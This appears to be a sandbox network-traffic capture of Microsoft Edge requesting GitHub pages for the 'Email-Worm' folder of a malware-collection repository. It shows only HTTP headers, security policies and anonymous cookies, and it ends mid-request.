objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 181
x-github-request-id: 06D8:75CAE:25DC72:309509:67D0F306
GET

https://github.com/Da2dalus/The-MALWARE-Repo/tree-commit-info/master/Email-Worm

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/tree-commit-info/master/Email-Worm HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:51 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"d002a9a26d3245d1c40661250a19aaab"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 781
x-github-request-id: 06D8:75CAE:25DC72:309508:67D0F306
GET

https://github.com/Da2dalus/The-MALWARE-Repo/deferred-metadata/master/Email-Worm

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/deferred-metadata/master/Email-Worm HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:51 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"9f73973c76baadcd58ac8580cb41395f"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 443
x-github-request-id: 06D8:75CAE:25DC72:309507:67D0F305
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 965
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Wed, 12 Mar 2025 02:35:51 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1741750551
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: 908E:1F1D3B:3A026:4FD84:67D0F307
GET

https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html, application/xhtml+xml, application/json
dnt: 1
turbo-visit: true
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
x-react-app-name: react-code-view
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:36:31 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"0f39bb212c719891b66f71101ccdd33b"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
x-html-safe: 551b05c23e87c25fdef8ecb9d40da50bde042bdda1be77488139e3bdfe555a1d
x-github-request-id: 10C5:21C830:620F8:7FAA9:67D0F32F
GET

https://github.com/Da2dalus/The-MALWARE-Repo/commits/deferred_commit_contributors

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/commits/deferred_commit_contributors HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:36:32 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"51d9a16534763506e8cd2fc0ed27768e"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 174
x-github-request-id: 10C5:21C830:62158:7FB24:67D0F32F
GET

https://github.com/Da2dalus/The-MALWARE-Repo/commits/deferred_commit_data/master?original_branch=master&path=Email-Worm

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/commits/deferred_commit_data/master?original_branch=master&path=Email-Worm HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
github-is-react: true
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:36:32 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"363d556c529190182430ff34867dfa2a"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 624
x-github-request-id: 10C5:21C830:62158:7FB25:67D0F330
GET

https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311 HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html, application/xhtml+xml, application/json
dnt: 1
turbo-visit: true
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
x-react-app-name: commits
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
